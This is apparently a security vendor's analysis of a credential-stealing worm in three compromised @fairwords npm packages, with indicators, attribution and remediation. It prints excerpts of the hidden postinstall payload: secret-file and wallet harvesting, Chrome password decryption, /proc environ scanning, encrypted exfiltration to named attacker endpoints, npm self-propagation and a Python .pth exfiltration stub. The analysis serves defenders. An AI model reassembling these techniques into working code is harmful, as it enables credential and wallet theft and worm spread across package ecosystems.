@fairwords npm Packages Hit by Credential Worm

TL;DR

Three npm packages under the @fairwords scope, @fairwords/[email protected], @fairwords/[email protected], and @fairwords/[email protected], were compromised simultaneously on April 8, 2026 (UTC). All three received an identical postinstall hook that runs a 1,149-line credential harvesting and self-propagation payload (scripts/check-env.js). The malware steals environment variables, SSH keys, cloud credentials, crypto wallet data, Chrome saved passwords, and .env files. It encrypts the stolen data with RSA-4096 and exfiltrates to two redundant channels: an HTTPS webhook and an Internet Computer (ICP) canister. If an npm token is found on the victim machine, the worm self-propagates by infecting other packages the token can publish. It also attempts cross-ecosystem propagation to PyPI using the .pth persistence technique.

Impact:

• Harvests sensitive environment variables matching 40+ patterns (AWS, GCP, Azure, GitHub, OpenAI, Stripe, etc.)
• Reads SSH keys, .npmrc, .git-credentials, .netrc, cloud CLI configs, Kubernetes configs, Docker auth
• Exfiltrates crypto wallet data: Solana keypairs, Ethereum keystores, Bitcoin wallet.dat, MetaMask (Chrome/Brave/Firefox), Phantom, Exodus, Atomic Wallet
• Decrypts Chrome saved passwords on Linux using the well-known PBKDF2(“peanuts”, “saltysalt”) key
• Self-propagates to all npm packages the victim’s token can publish
• Attempts cross-ecosystem propagation to PyPI via .pth file injection

Indicators of Compromise (IoC):

Analysis

Package Overview

The @fairwords npm scope is used internally by FairWords/MyComplianceOffice (a compliance software company). The scope has 21 maintainers with @fairwords.com and @mycomplianceoffice.com email addresses. @fairwords/websocket is a fork of the popular websocket package (WebSocket-Node by theturtle32), @fairwords/loopback-connector-es is a fork of a LoopBack Elasticsearch connector, and @fairwords/encryption is an internal encryption utility.

All three packages had been dormant since 2022. On April 8, 2026 at 02:58 UTC, all three received malicious versions simultaneously ([email protected], [email protected], [email protected]). Approximately 8 minutes later, the worm self-propagated, publishing second-generation versions (1.0.39, 1.4.4, 0.0.6). These versions still contain the malicious payload (a stripped-down variant without comments but functionally identical), confirming the worm used the compromised token to re-publish itself. The fourth package in the scope, @fairwords/abstraction-layer, was not affected.

The [email protected] propagation was partially broken: package.json has the postinstall hook, but the scripts/check-env.js and public.pem files are missing from the tarball. The || true in the hook makes it fail silently, so the payload does not execute on this package.

Execution Trigger

All three packages received an identical change: a postinstall script was added to package.json, plus two new files (scripts/check-env.js and public.pem):

1
// package.json diff (both packages)
2
  "scripts": {
3
    "gulp": "gulp"
4
    "gulp": "gulp",
5
    "postinstall": "node scripts/check-env.js || true"
6
  }

The || true ensures the install succeeds even if the payload crashes. The payload is wired to the package’s postinstall lifecycle script, so it executes during npm install of the affected package.

Phase 1: Credential Harvesting

The harvest() function is comprehensive. It collects:

Environment variables matching 40+ regex patterns covering every major cloud, CI/CD, and SaaS provider:

1
const sensitivePatterns = [
2
  /TOKEN/i,
3
  /SECRET/i,
4
  /KEY/i,
5
  /PASSWORD/i,
6
  /CREDENTIAL/i,
7
  /^AWS_/i,
8
  /^AZURE_/i,
9
  /^GCP_/i,
10
  /^GOOGLE_/i,
11
  /^NPM_/i,
12
  /^GITHUB_/i,
13
  /^GITLAB_/i,
14
  /^DOCKER_/i,
15
  /^OPENAI/i,
16
  /^ANTHROPIC/i,
17
  /^COHERE/i, // LLM API keys
18
  /^PRIVATE/i,
19
  /^SIGNING/i,
20
  /^ENCRYPTION/i, // Crypto material
21
  // ... 40+ patterns total
22
];

Filesystem secrets from 30+ locations including .npmrc, SSH keys, .git-credentials, .netrc, AWS/GCP/Azure CLI configs, Kubernetes configs, Docker auth, Terraform/Pulumi credentials, Heroku/Vercel/Netlify configs, database password files (.pgpass, .my.cnf), and CI/CD tokens:

1
grab('npmrc', path.join(home, '.npmrc'));
2
grabDir('ssh_keys', path.join(home, '.ssh'), (f) => f.startsWith('id_') || f === 'config' || f === 'known_hosts');
3
grab('aws_credentials', path.join(home, '.aws', 'credentials'));
4
grab('kubeconfig', path.join(home, '.kube', 'config'));
5
grab('terraform_credentials', path.join(home, '.terraform.d', 'credentials.tfrc.json'));

Crypto wallet data, reading the actual wallet files (not just checking existence):

1
// scripts/check-env.js — Solana private key (plaintext JSON, immediately spendable)
2
grab('solana_keypair', path.join(home, '.config', 'solana', 'id.json'));
3

4
// Ethereum Geth keystore — all files, AES-encrypted
5
grabDir('ethereum_keystore', path.join(home, '.ethereum', 'keystore'), () => true);
6

7
// MetaMask Chrome extension LevelDB — contains AES-GCM encrypted vault
8
const mmChrome = path.join(
9
  home,
10
  '.config',
11
  'google-chrome',
12
  'Default',
13
  'Local Extension Settings',
14
  'nkbihfbeogaeaoehlefnkodbefgpgknn'
15
);

The payload targets MetaMask (Chrome, Brave, Firefox), Phantom (Solana), Exodus, Atomic Wallet, Bitcoin Core (wallet.dat), and Electrum wallets.

Chrome password decryption. On Linux, Chromium’s v10 encryption path uses a key derived from PBKDF2 with the hardcoded password peanuts and salt saltysalt (1 iteration). Current Chrome versions prefer a key stored in Secret Service or KWallet when available, but the v10 fallback remains in the codebase. The payload targets this legacy path:

1
const password = 'peanuts';
2
const salt = Buffer.from('saltysalt');
3
const key = crypto.pbkdf2Sync(password, salt, 1, 16, 'sha1');
4
// ... decrypts and exfiltrates up to 50 saved passwords

Process environment scanning. On Linux, the payload reads /proc/[pid]/environ for other processes, looking for tokens and secrets in their environment:

1
const procs = fs
2
  .readdirSync('/proc')
3
  .filter((f) => /^\d+$/.test(f))
4
  .slice(0, 50);
5
for (const pid of procs) {
6
  const env = fs.readFileSync(`/proc/${pid}/environ`, 'utf8');
7
  if (/TOKEN|SECRET|KEY|PASSWORD/i.test(env)) {
8
    procEnvs.push({ pid, cmdline, env });
9
  }
10
}

Our dynamic analysis infra captured this behavior at runtime — the payload was observed reading /proc/[pid]/environ for multiple processes within milliseconds:

Phase 2: Encrypted Exfiltration

All harvested data is encrypted with a hybrid RSA-4096 + AES-256-CBC scheme. A random 32-byte AES session key encrypts the payload, and the session key is then encrypted with the attacker’s 4096-bit RSA public key (bundled as public.pem). Only the holder of the private key can decrypt:

1
const sessionKey = crypto.randomBytes(32);
2
const iv = crypto.randomBytes(16);
3
const cipher = crypto.createCipheriv('aes-256-cbc', sessionKey, iv);
4
// ... encrypt payload ...
5
const encKey = crypto.publicEncrypt(
6
  { key: pubKey, padding: crypto.constants.RSA_PKCS1_OAEP_PADDING, oaepHash: 'sha256' },
7
  sessionKey
8
);

The encrypted blob is sent to two independent exfiltration channels simultaneously:

1. HTTPS webhook at hxxps://telemetry[.]api-monitor[.]com/v1/telemetry (143.198.237.25, DigitalOcean, Santa Clara). The malware includes an HMAC-SHA256 header to authenticate uploads to the webhook. The TLS certificate was issued by Let’s Encrypt on April 5, 2026.

2. Internet Computer (ICP) canister at l6wk4-myaaa-aaaac-qghxq-cai[.]raw[.]icp0[.]io/drop. This is a decentralized, censorship-resistant storage backend. The canister is live and accepting data (returns {"success":true} on POST). Large payloads are chunked into 800KB segments. This channel requires no authentication and provides a takedown-resistant fallback.

Phase 3-5: npm Self-Propagation

If an npm token is found (via NPM_TOKEN env var or .npmrc), the worm:

1. Calls /-/whoami to identify the token owner
2. Enumerates all packages the token can publish via /-/user/org.couchdb.user:{username}/package
3. For each package: downloads the latest tarball, injects the postinstall hook and payload, bumps the patch version, and publishes

1
// scripts/check-env.js — the self-propagation core
2
pj.scripts.postinstall = 'node scripts/check-env.js || true';
3
fs.copyFileSync(__filename, path.join(scriptsDir, 'check-env.js'));
4
execSync(`npm publish --userconfig="${rc}" --registry="${REGISTRY}"`, {
5
  cwd: pkgDir,
6
  stdio: 'pipe',
7
  timeout: 30000,
8
});

This is confirmed by the existence of versions 1.0.39, 1.4.4, and 0.0.6, which were published 8 minutes after the initial compromise and contain a variant of the same payload (different hash, comments stripped, same functionality). The [email protected] propagation was incomplete: the postinstall hook is present but the payload files were not included in the tarball.

Phase 6: Cross-Ecosystem PyPI Propagation

If a PyPI token is found (via TWINE_PASSWORD or ~/.pypirc), the worm crosses into the Python ecosystem using the .pth file technique. Python’s site module processes .pth files in site-packages at every interpreter startup — any line starting with import is executed as code, which the malware exploits to run its payload:

1
// scripts/check-env.js — .pth payload (Python code)
2
return `import os, sys, json, urllib.request, socket, platform
3
_creds = {k: v for k, v in os.environ.items() if any(p in k.upper()
4
  for p in ['TOKEN','SECRET','KEY','PASSWORD','CREDENTIAL',...])}
5
// ... harvest and exfiltrate to telemetry.api-monitor.com/v1/drop
6
`;

This means every python invocation on an infected system would re-harvest and exfiltrate credentials, not just during package installation.

Safety Controls (Attacker Configuration)

The payload includes configurable propagation controls via environment variables:

With defaults, the worm harvests and exfiltrates credentials but logs propagation without executing it. This suggests the attacker deployed incrementally: credential theft first, propagation enabled selectively per target.

Remediation

If you installed any of these versions: @fairwords/[email protected] or @1.0.39, @fairwords/[email protected] or @1.4.4, @fairwords/[email protected] or @0.0.6:

1. Rotate all credentials on the affected machine immediately: npm tokens, AWS/GCP/Azure keys, SSH keys, GitHub tokens, database passwords, API keys
2. Check crypto wallets: if Solana CLI, MetaMask, Phantom, Exodus, or Atomic Wallet data was present, consider those wallets compromised
3. Audit npm publishes: check if any packages you maintain received unexpected version bumps
4. Review Chrome saved passwords: if running on Linux, assume all Chrome-saved passwords are compromised
5. Remove the packages and reinstall from known-clean versions (1.0.37 for websocket, 1.4.2 for loopback-connector-es, 0.0.4 for encryption)

Attribution: TeamPCP / CanisterWorm Campaign

This compromise is a new instance of the CanisterWorm worm, part of the broader TeamPCP supply chain campaign that has been active since March 2026. The payload identifies itself: the header comment reads “Models the full SHA1-Hulud attack chain” and references “TeamPCP .pth technique” and “TeamPCP/LiteLLM method” six times throughout the source.

The technical fingerprints match the known campaign:

• ICP canister as dead-drop. CanisterWorm was the first publicly documented malware to use ICP canisters for C2. This payload uses the same pattern (l6wk4-myaaa-aaaac-qghxq-cai.raw.icp0.io/drop).
• npm token self-propagation. The same mechanism documented in CanisterWorm’s self-spreading mutations: steal token, enumerate packages, inject postinstall hook, bump version, publish.
• Cross-ecosystem .pth injection. TeamPCP pioneered this in the LiteLLM compromise (March 24, 2026), where .pth files execute on every Python interpreter startup.

The known campaign timeline: Trivy compromise (March 19) → CanisterWorm on npm (March 2026) → LiteLLM on PyPI (March 24) → @fairwords (April 8). This variant adds Chrome password decryption, comprehensive crypto wallet theft (Solana, Ethereum, MetaMask, Phantom, Exodus, Atomic), and /proc/environ scanning, representing a more evolved payload than earlier CanisterWorm samples.

Conclusion

This is the latest known propagation of the TeamPCP/CanisterWorm campaign, hitting three out of four internal packages belonging to a compliance software company. The payload combines credential harvesting across every major cloud and CI/CD platform, crypto wallet theft, Chrome password decryption, redundant encrypted exfiltration (HTTPS + decentralized ICP canister), npm self-propagation, and cross-ecosystem PyPI infection in a single postinstall script. The ICP canister as an exfiltration channel remains a takedown-resistant storage backend that traditional domain-based blocking cannot address.